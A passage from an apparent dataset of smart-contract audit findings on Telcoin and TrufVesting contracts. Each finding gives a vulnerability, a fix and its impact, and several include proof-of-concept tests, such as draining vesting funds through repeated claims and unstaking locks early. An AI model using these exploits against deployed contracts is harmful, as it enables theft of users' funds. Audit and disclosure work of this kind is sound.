```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n
`StakingRewardsManager::topUp(...)` Misallocates Funds to `StakingRewards` Contracts
high
The `StakingRewardsManager::topUp(...)` contract exhibits an issue where the specified `StakingRewards` contracts are not topped up at the correct indices, resulting in an incorrect distribution to different contracts.\\nThe `StakingRewardsManager::topUp(...)` function is designed to top up multiple `StakingRewards` contracts simultaneously by taking the indices of the contract's addresses in the `StakingRewardsManager::stakingContracts` array. However, the flaw lies in the distribution process:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n\\nGitHub: [254-278]\\nThe rewards are not appropriately distributed to the `StakingRewards` contracts at the specified indices. Instead, they are transferred to the contracts at the loop indices. For instance, if intending to top up contracts at indices `[1, 2]`, the actual top-up occurs at indices `[0, 1]`.
It is recommended to do the following changes:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i// Add the line below\\n// Add the line below\\n) {\\n // get staking contract and config\\n// Remove the line below\\n StakingRewards staking = stakingContracts[i];\\n// Add the line below\\n StakingRewards staking = stakingContracts[indices[i]];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n
The consequence of this vulnerability is that rewards will be distributed to the incorrect staking contract, leading to potential misallocation and unintended outcomes.
```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n
Wrong parameter when retrieving causes a complete DoS of the protocol
high
A wrong parameter in the `_retrieve()` prevents the protocol from properly interacting with Sablier, causing a Denial of Service in all functions calling `_retrieve()`.\\nThe `CouncilMember` contract is designed to interact with a Sablier stream. As time passes, the Sablier stream will unlock more TELCOIN tokens which will be available to be retrieved from `CouncilMember`.\\nThe `_retrieve()` internal function will be used in order to fetch the rewards from the stream and distribute them among the Council Member NFT holders (snippet reduced for simplicity):\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThe most important part in `_retrieve()` regarding the vulnerability that we'll dive into is the `_stream.execute()` interaction and the params it receives. In order to understand such interaction, we first need understand the importance of the `_stream` and the `_target` variables.\\nSablier allows developers to integrate Sablier via Periphery contracts, which prevents devs from dealing with the complexity of directly integrating Sablier's Core contracts. Telcoin developers have decided to use these periphery contracts. Concretely, the following contracts have been used:\\nNOTE: It is important to understand that the actual lockup linear stream will be deployed as well. The difference is that the Telcoin protocol will not interact with that contract directly. Instead, the PRBProxy and proxy target contracts will be leveraged to perform such interactions.\\nKnowing this, we can now move on to explaining Telcoin's approach to withdrawing the available tokens from the stream. As seen in the code snippet above, the `_retrieve()` function will perform two steps to actually perform a withdraw from the stream:\\nIt will first call the _stream's `execute()` function (remember `_stream` is a PRBProxy). This function receives a `target` and some `data` as parameter, and performs a delegatecall aiming at the target:\\nIn the `_retrieve()` function, the target where the call will be forwarded to is the `_target` parameter, which is a ProxyTarget contract. Concretely, the delegatecall function that will be triggered in the ProxyTarget will be withdrawMax():\\nAs we can see, the `withdrawMax()` function has as parameters the `lockup` stream contract `to` withdraw from, the `streamId` and the address `to` which will receive the available funds from the stream. The vulnerability lies in the parameters passed when calling the `withdrawMax()` function in `_retrieve()`. As we can see, the first encoded parameter in the `encodeWithSelector()` call after the selector is the _target:\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, // <------- This is incorrect\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThis means that the proxy target's `withdrawMax()` function will be triggered with the `_target` contract as the `lockup` parameter, which is incorrect. 
This will make all calls eventually execute `withdrawMax()` on the PRBProxy contract, always reverting.\\nThe parameter needed to perform the `withdrawMax()` call correctly is the actual Sablier lockup contract, which is currently not stored in the `CouncilMember` contract.
In order to fix the vulnerability, the proper address needs to be passed when calling `withdrawMax()`.\\nNote that the actual stream address is currently NOT stored in `CouncilMember.sol`, so it will need to be stored (my example shows a new `actualStream` variable)\\n```\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n// Remove the line below\\n _target, \\n// Add the line below\\n actualStream\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n
High. ALL withdrawals from the Sablier stream will revert, effectively causing a DoS in the _retrieve() function. Because the _retrieve() function is called in all the main protocol functions, this vulnerability essentially prevents the protocol from ever functioning correctly.\\nProof of Concept\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport {Test, console2} from "forge-std/Test.sol";\\nimport {SablierV2Comptroller} from "@sablier/v2-core/src/SablierV2Comptroller.sol";\\nimport {SablierV2NFTDescriptor} from "@sablier/v2-core/src/SablierV2NFTDescriptor.sol";\\nimport {SablierV2LockupLinear} from "@sablier/v2-core/src/SablierV2LockupLinear.sol";\\nimport {ISablierV2Comptroller} from "@sablier/v2-core/src/interfaces/ISablierV2Comptroller.sol";\\nimport {ISablierV2NFTDescriptor} from "@sablier/v2-core/src/interfaces/ISablierV2NFTDescriptor.sol";\\nimport {ISablierV2LockupLinear} from "@sablier/v2-core/src/interfaces/ISablierV2LockupLinear.sol";\\n\\nimport {CouncilMember, IPRBProxy} from "../src/core/CouncilMember.sol";\\nimport {TestTelcoin} from "./mock/TestTelcoin.sol";\\nimport {MockProxyTarget} from "./mock/MockProxyTarget.sol";\\nimport {PRBProxy} from "./mock/MockPRBProxy.sol";\\nimport {PRBProxyRegistry} from "./mock/MockPRBProxyRegistry.sol";\\n\\nimport {UD60x18} from "@prb/math/src/UD60x18.sol";\\nimport {LockupLinear, Broker, IERC20} from "@sablier/v2-core/src/types/DataTypes.sol";\\nimport {IERC20 as IERC20OZ} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\n\\ncontract PocTest is Test {\\n\\n ////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n ////////////////////////////////////////////////////////////////\\n\\n bytes32 public constant GOVERNANCE_COUNCIL_ROLE =\\n keccak256("GOVERNANCE_COUNCIL_ROLE");\\n bytes32 public constant SUPPORT_ROLE = keccak256("SUPPORT_ROLE");\\n\\n ////////////////////////////////////////////////////////////////\\n // STORAGE //\\n ////////////////////////////////////////////////////////////////\\n\\n /// @notice Poc Users\\n address public sablierAdmin;\\n address public user;\\n\\n /// @notice Sablier contracts\\n SablierV2Comptroller public comptroller;\\n SablierV2NFTDescriptor public nftDescriptor;\\n SablierV2LockupLinear public lockupLinear;\\n\\n /// @notice Telcoin contracts\\n PRBProxyRegistry public proxyRegistry;\\n PRBProxy public stream;\\n MockProxyTarget public target;\\n CouncilMember public councilMember;\\n TestTelcoin public telcoin;\\n\\n function setUp() public {\\n // Setup users\\n _setupUsers();\\n\\n // Deploy token\\n telcoin = new TestTelcoin(address(this));\\n\\n // Deploy Sablier \\n _deploySablier();\\n\\n // Deploy council member\\n councilMember = new CouncilMember();\\n\\n // Setup stream\\n _setupStream();\\n\\n // Setup the council member\\n _setupCouncilMember();\\n }\\n\\n function testPoc() public {\\n // Step 1: Mint council NFT to user\\n councilMember.mint(user);\\n assertEq(councilMember.balanceOf(user), 1);\\n\\n // Step 2: Forward time 1 days\\n vm.warp(block.timestamp + 1 days);\\n \\n // Step 3: All functions calling _retrieve() (mint(), burn(), removeFromOffice()) will fail\\n vm.expectRevert(abi.encodeWithSignature("PRBProxy_ExecutionReverted()")); \\n councilMember.mint(user);\\n }\\n\\n function _setupUsers() internal {\\n sablierAdmin = makeAddr("sablierAdmin");\\n user = makeAddr("user");\\n }\\n\\n function _deploySablier() internal {\\n // Deploy protocol\\n comptroller = new SablierV2Comptroller(sablierAdmin);\\n 
nftDescriptor = new SablierV2NFTDescriptor();\\n lockupLinear = new SablierV2LockupLinear(\\n sablierAdmin,\\n ISablierV2Comptroller(address(comptroller)),\\n ISablierV2NFTDescriptor(address(nftDescriptor))\\n );\\n }\\n\\n function _setupStream() internal {\\n\\n // Deploy proxies\\n proxyRegistry = new PRBProxyRegistry();\\n stream = PRBProxy(payable(address(proxyRegistry.deploy())));\\n target = new MockProxyTarget();\\n\\n // Setup stream\\n LockupLinear.Durations memory durations = LockupLinear.Durations({\\n cliff: 0,\\n total: 1 weeks\\n });\\n\\n UD60x18 fee = UD60x18.wrap(0);\\n\\n Broker memory broker = Broker({account: address(0), fee: fee});\\n LockupLinear.CreateWithDurations memory params = LockupLinear\\n .CreateWithDurations({\\n sender: address(this),\\n recipient: address(stream),\\n totalAmount: 100e18,\\n asset: IERC20(address(telcoin)),\\n cancelable: false,\\n transferable: false,\\n durations: durations,\\n broker: broker\\n });\\n\\n bytes memory data = abi.encodeWithSelector(target.createWithDurations.selector, address(lockupLinear), params, "");\\n\\n // Create the stream through the PRBProxy\\n telcoin.approve(address(stream), type(uint256).max);\\n bytes memory response = stream.execute(address(target), data);\\n assertEq(lockupLinear.ownerOf(1), address(stream));\\n }\\n\\n function _setupCouncilMember() internal {\\n // Initialize\\n councilMember.initialize(\\n IERC20OZ(address(telcoin)),\\n "Test Council",\\n "TC",\\n IPRBProxy(address(stream)), // stream_\\n address(target), // target_\\n 1, // id_\\n address(lockupLinear)\\n );\\n\\n // Grant roles\\n councilMember.grantRole(GOVERNANCE_COUNCIL_ROLE, address(this));\\n councilMember.grantRole(SUPPORT_ROLE, address(this));\\n }\\n \\n}\\n```\\n
```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n
CouncilMember:burn renders the contract inoperable after the first execution
high
The CouncilMember contract suffers from a critical vulnerability that misaligns the balances array after a successful burn, rendering the contract inoperable.\\nThe root cause of the vulnerability is that the `burn` function incorrectly manages the `balances` array, shortening it by one each time an ERC721 token is burned while the latest minted NFT still withholds its unique `tokenId` which maps to the previous value of `balances.length`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n\\nThis misalignment between existing `tokenIds` and the `balances` array results in several critical impacts:\\nHolders with `tokenId` greater than the length of balances cannot claim.\\nSubsequent burns of `tokenId` greater than balances length will revert.\\nSubsequent mint operations will revert due to `tokenId` collision. As `totalSupply` now collides with the existing `tokenId`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function mint(\\n // rest of code\\n balances.push(0);\\n _mint(newMember, totalSupply());// <= FOUND\\n }\\n```\\n\\nThis mismanagement creates a cascading effect, collectively rendering the contract inoperable. Following POC will demonstrate the issue more clearly in codes.\\nPOC\\nRun `git apply` on the following patch then run `npx hardhat test` to run the POC.\\n```\\ndiff --git a/telcoin-audit/test/sablier/CouncilMember.test.ts b/telcoin-audit/test/sablier/CouncilMember.test.ts\\nindex 675b89d..ab96b08 100644\\n--- a/telcoin-audit/test/sablier/CouncilMember.test.ts\\n+++ b/telcoin-audit/test/sablier/CouncilMember.test.ts\\n@@ -1,13 +1,14 @@\\n import { expect } from "chai";\\n import { ethers } from "hardhat";\\n import { SignerWithAddress } from "@nomicfoundation/hardhat-ethers/signers";\\n-import { CouncilMember, TestTelcoin, TestStream } from "../../typechain-types";\\n+import { CouncilMember, TestTelcoin, TestStream, ERC721Upgradeable__factory } from "../../typechain-types";\\n \\n describe("CouncilMember", () => {\\n let admin: SignerWithAddress;\\n let support: SignerWithAddress;\\n let member: SignerWithAddress;\\n let holder: SignerWithAddress;\\n+ let lastCouncilMember: SignerWithAddress;\\n let councilMember: CouncilMember;\\n let telcoin: TestTelcoin;\\n let stream: TestStream;\\n@@ -18,7 +19,7 @@ describe("CouncilMember", () => {\\n let supportRole: string = ethers.keccak256(ethers.toUtf8Bytes("SUPPORT_ROLE"));\\n \\n beforeEach(async () => {\\n- [admin, support, member, holder, target] = await ethers.getSigners();\\n+ [admin, support, member, holder, target, lastCouncilMember] = await ethers.getSigners();\\n \\n const TestTelcoinFactory = await ethers.getContractFactory("TestTelcoin", admin);\\n telcoin = await TestTelcoinFactory.deploy(admin.address);\\n@@ -182,6 +183,22 @@ describe("CouncilMember", () => {\\n it("the correct removal is made", async () => {\\n await expect(councilMember.burn(1, support.address)).emit(councilMember, "Transfer");\\n });\\n+ it.only("inoperable contract after burn", async () => {\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.not.reverted;\\n+\\n+ // This 1st burn will cause contract inoperable due to tokenId & balances misalignment\\n+ await expect(councilMember.burn(1, support.address)).emit(councilMember, "Transfer");\\n+\\n+ // Impact 1. 
holder with tokenId > balances length cannot claim\\n+ await expect(councilMember.connect(lastCouncilMember).claim(3, 1)).to.revertedWithPanic("0x32"); // @audit-info 0x32: Array accessed at an out-of-bounds or negative index\\n+\\n+ // Impact 2. subsequent burns of tokenId > balances length will revert\\n+ await expect(councilMember.burn(3, lastCouncilMember.address)).to.revertedWithPanic("0x32"); \\n+\\n+ // Impact 3. subsequent mint will revert due to tokenId collision\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.revertedWithCustomError(councilMember, "ERC721InvalidSender");\\n+\\n+ });\\n });\\n });\\n \\n```\\n\\nResult\\nCouncilMember mutative burn Success ✔ inoperable contract after burn (90ms) 1 passing (888ms)\\nThe Passing execution of the POC confirmed that operations such as `claim`, `burn` & `mint` were all reverted which make the contract inoperable.
It is recommended to avoid popping out balances to keep alignment with uniquely minted tokenId. Alternatively, consider migrating to ERC1155, which inherently manages a built-in balance for each NFT.
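One possible shape of the first suggestion (a sketch only; the role names are taken from the PoC above, and the payout and `_retrieve()` logic is omitted):\\n```\\nmapping(uint256 => uint256) public balanceOfToken; // replaces the balances array\\nuint256 private nextTokenId;\\n\\nfunction mint(address newMember) external onlyRole(GOVERNANCE_COUNCIL_ROLE) {\\n    // A monotonically increasing id avoids collisions with totalSupply().\\n    uint256 tokenId = nextTokenId++;\\n    _mint(newMember, tokenId);\\n}\\n\\nfunction burn(uint256 tokenId, address recipient) external onlyRole(GOVERNANCE_COUNCIL_ROLE) {\\n    // Pay out balanceOfToken[tokenId] to `recipient` as needed, then clear only\\n    // this token's slot; other holders' tokenIds keep pointing at their balances.\\n    delete balanceOfToken[tokenId];\\n    _burn(tokenId);\\n}\\n```\\n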
The severity of the vulnerability is high due to the high likelihood of occurrence and the critical impacts on the contract's operability and token holders' ability to interact with their assets.
```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n
Users can fully drain the `TrufVesting` contract
high
Due to flaw in the logic in `claimable` any arbitrary user can drain all the funds within the contract.\\nA user's claimable is calculated in the following way:\\nUp until start time it is 0.\\nBetween start time and cliff time it's equal to `initialRelease`.\\nAfter cliff time, it linearly increases until the full period ends.\\nHowever, if we look at the code, when we are at stage 2., it always returns `initialRelease`, even if we've already claimed it. This would allow for any arbitrary user to call claim as many times as they wish and every time they'd receive `initialRelease`. Given enough iterations, any user can drain the contract.\\n```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n\\n```\\n function claim(address user, uint256 categoryId, uint256 vestingId, uint256 claimAmount) public {\\n if (user != msg.sender && (!categories[categoryId].adminClaimable || msg.sender != owner())) {\\n revert Forbidden(msg.sender);\\n }\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (claimAmount == type(uint256).max) {\\n claimAmount = claimableAmount;\\n } else if (claimAmount > claimableAmount) {\\n revert ClaimAmountExceed();\\n }\\n if (claimAmount == 0) {\\n revert ZeroAmount();\\n }\\n\\n categories[categoryId].totalClaimed += claimAmount;\\n userVestings[categoryId][vestingId][user].claimed += claimAmount;\\n trufToken.safeTransfer(user, claimAmount);\\n\\n emit Claimed(categoryId, vestingId, user, claimAmount);\\n }\\n```\\n
change the if check to the following\\n```\\n if (startTime > block.timestamp) {\\n if (initialRelease > userVesting.claimed) {\\n return initialRelease - userVesting.claimed;\\n }\\n else { return 0; } \\n }\\n```\\n\\nPoC\\n```\\n function test_cliffVestingDrain() public { \\n _setupVestingPlan();\\n uint256 categoryId = 2;\\n uint256 vestingId = 0;\\n uint256 stakeAmount = 10e18;\\n uint256 duration = 30 days;\\n\\n vm.startPrank(owner);\\n \\n vesting.setUserVesting(categoryId, vestingId, alice, 0, stakeAmount);\\n\\n vm.warp(block.timestamp + 11 days); // warping 11 days, because initial release period is 10 days\\n // and cliff is at 20 days. We need to be in the middle \\n vm.startPrank(alice);\\n assertEq(trufToken.balanceOf(alice), 0);\\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n \\n uint256 balance = trufToken.balanceOf(alice);\\n assertEq(balance, stakeAmount * 5 / 100); // Alice should be able to have claimed just 5% of the vesting \\n\\n for (uint i; i < 39; i++ ){ \\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n }\\n uint256 newBalance = trufToken.balanceOf(alice); // Alice has claimed 2x the amount she was supposed to be vested. \\n assertEq(newBalance, stakeAmount * 2); // In fact she can keep on doing this to drain the whole contract\\n }\\n```\\n
Any user can drain the contract
```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n
`cancelVesting` will potentially not give users unclaimed, vested funds, even if giveUnclaimed = true
high
The purpose of `cancelVesting` is to cancel a vesting grant and potentially give users unclaimed but vested funds in the event that `giveUnclaimed = true`. However, due to a bug, in the event that the user had staked / locked funds, they will potentially not received the unclaimed / vested funds even if `giveUnclaimed = true`.\\nHere's the cancelVesting function in TrufVesting:\\n```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n\\nFirst, consider the following code:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n}\\n```\\n\\nFirst the locked / staked funds will essentially be un-staked. The following line of code: `userVesting.locked = 0;` exists because there is a call to `uint256 claimableAmount = claimable(categoryId, vestingId, user);` afterwards, and in the event that there were locked funds that were unstaked, these funds should now potentially be `claimable` if they are vested (but if locked is not set to 0, then the vested funds will potentially not be deemed `claimable` by the `claimable` function).\\nHowever, because `userVesting` is `memory` rather than `storage`, this doesn't end up happening (so `userVesting.locked = 0;` is actually a bug). This means that if a user is currently staking all their funds (so all their funds are locked), and `cancelVesting` is called, then they will not receive any funds back even if `giveUnclaimed = true`. This is because the `claimable` function (which will access the unaltered userVestings[categoryId][vestingId][user]) will still think that all the funds are currently locked, even though they are not as they have been forcibly unstaked.
Change `userVesting.locked = 0;` to `userVestings[categoryId][vestingId][user].locked = 0;`
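In context, the corrected block writes through to storage so that the later `claimable()` call sees the unlocked amount:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n    veTRUF.unstakeVesting(user, lockupId - 1, true);\\n    delete lockupIds[categoryId][vestingId][user];\\n    // Write to storage (read by claimable()), not only to the memory copy.\\n    userVestings[categoryId][vestingId][user].locked = 0;\\n    userVesting.locked = 0;\\n}\\n```\\n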
When `cancelVesting` is called, a user may not receive their unclaimed, vested funds.
```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n
When migrating the owner users will lose their rewards
medium
When a user migrates the owner due to a lost private key, the rewards belonging to the previous owner remain recorded in their account and cannot be claimed, resulting in the loss of user rewards.\\nAccording to the documentation, `migrateUser()` is used when a user loses their private key to migrate the old vesting owner to a new owner.\\n```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n\\nIn this function, the protocol calls `migrateVestingLock()` to obtain a new ID.\\n```\\n if (lockupId != 0) {\\n newLockupId = veTRUF.migrateVestingLock(prevUser, newUser, lockupId - 1) + 1;\\n lockupIds[categoryId][vestingId][newUser] = newLockupId;\\n delete lockupIds[categoryId][vestingId][prevUser];\\n\\n newVesting.locked = prevVesting.locked;\\n }\\n```\\n\\nHowever, in the `migrateVestingLock()` function, the protocol calls `stakingRewards.withdraw()` to withdraw the user's stake, burning points. In the `withdraw()` function, the protocol first calls `updateReward()` to update the user's rewards and records them in the user's account.\\n```\\n function withdraw(address user, uint256 amount) public updateReward(user) onlyOperator {\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n _totalSupply -= amount;\\n _balances[user] -= amount;\\n emit Withdrawn(user, amount);\\n }\\n```\\n\\nHowever, `stakingRewards.withdraw()` is called with the old owner as a parameter, meaning that the rewards will be updated on the old account.\\n```\\n uint256 points = oldLockup.points;\\n stakingRewards.withdraw(oldUser, points);\\n _burn(oldUser, points);\\n```\\n\\nAs mentioned earlier, the old owner has lost their private key and cannot claim the rewards, resulting in the loss of these rewards.
When migrating the owner, the rewards belonging to the previous owner should be transferred to the new owner.
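A hypothetical sketch of how this could look in the staking rewards contract, assuming a Synthetix-style `rewards` mapping and the `updateReward` / `onlyOperator` modifiers shown above (names may differ in the actual contract):\\n```\\n/// @dev Move accrued-but-unclaimed rewards from the lost account to the new one.\\n///      Intended to be called from migrateVestingLock alongside the existing\\n///      withdraw/stake of the lockup points.\\nfunction migrateRewards(address oldUser, address newUser)\\n    external\\n    onlyOperator\\n    updateReward(oldUser)\\n    updateReward(newUser)\\n{\\n    rewards[newUser] += rewards[oldUser];\\n    rewards[oldUser] = 0;\\n}\\n```\\n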
The user's rewards are lost
```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n
Ended locks can be extended
medium
When a lock period ends, it can be extended. If the new extension 'end' is earlier than the current block.timestamp, the user will have a lock that can be unstaked at any time."\\nWhen the lock period ends, the owner of the expired lock can extend it to set a new lock end that is earlier than the current block.timestamp. By doing so, the lock owner can create a lock that is unstakeable at any time.\\nThis is doable because there are no checks in the extendLock function that checks whether the lock is already ended or not.\\nPoC:\\n```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n 